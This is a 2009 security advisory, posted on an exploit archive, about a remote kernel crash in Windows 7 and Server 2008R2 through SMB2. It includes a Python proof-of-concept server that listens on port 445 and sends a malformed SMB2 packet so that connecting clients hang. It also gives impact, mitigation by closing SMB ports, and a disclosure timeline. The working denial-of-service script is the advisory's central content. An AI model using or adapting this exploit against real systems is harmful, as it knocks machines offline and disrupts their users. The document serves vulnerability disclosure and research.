Home / exploits win7-crash.txt
Posted on 17 November 2009
============================================= - Release date: November 11th, 2009 - Discovered by: Laurent Gaffié - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Windows 7 * , Server 2008R2 Remote Kernel Crash II. BACKGROUND ------------------------- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL III. DESCRIPTION ------------------------- See : http://g-laurent.blogspot.com/ for much more details #Comment: This bug is specific Windows 7/2008R2. IV. PROOF OF CONCEPT ------------------------- #win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast from the target: \this_script_ip_addrBLAH , instantly crash #Author: Laurent Gaffié # import SocketServer packet = "x00x00x00x9a" # ---> length should be 9e not 9a.. "xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00" "x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41" "xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00" "x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01" "xcbx51xe0x19x62x60xcax01x80x00x1ex00x20x4cx4dx20" "x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e" "x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a" class SMB2(SocketServer.BaseRequestHandler): def handle(self): print "Who:", self.client_address input = self.request.recv(1024) self.request.send(packet) self.request.close() launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445 launch.serve_forever() #SDL FAILED V. BUSINESS IMPACT ------------------------- An attacker can remotly crash any Windows 7/Server 2008R2. VI. SYSTEMS AFFECTED ------------------------- Windows 7, Windowns Server 2008R2 VII. SOLUTION ------------------------- No patch available for the moment, your vendor do not care. Close SMB feature and ports, until a real audit is provided. VIII. REFERENCES ------------------------- http://blogs.msdn.com/sdl/ http://g-laurent.blogspot.com/ http://twitter.com/g_laurent IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- November 8th, 2009: MSRC contacted November 8th, 2009: MSRC acknoledge the vuln November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin. November 11th, 2009: Win 7 remote kernel smash released XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes ------------------------- More Remote Kernel FD @MS to come.
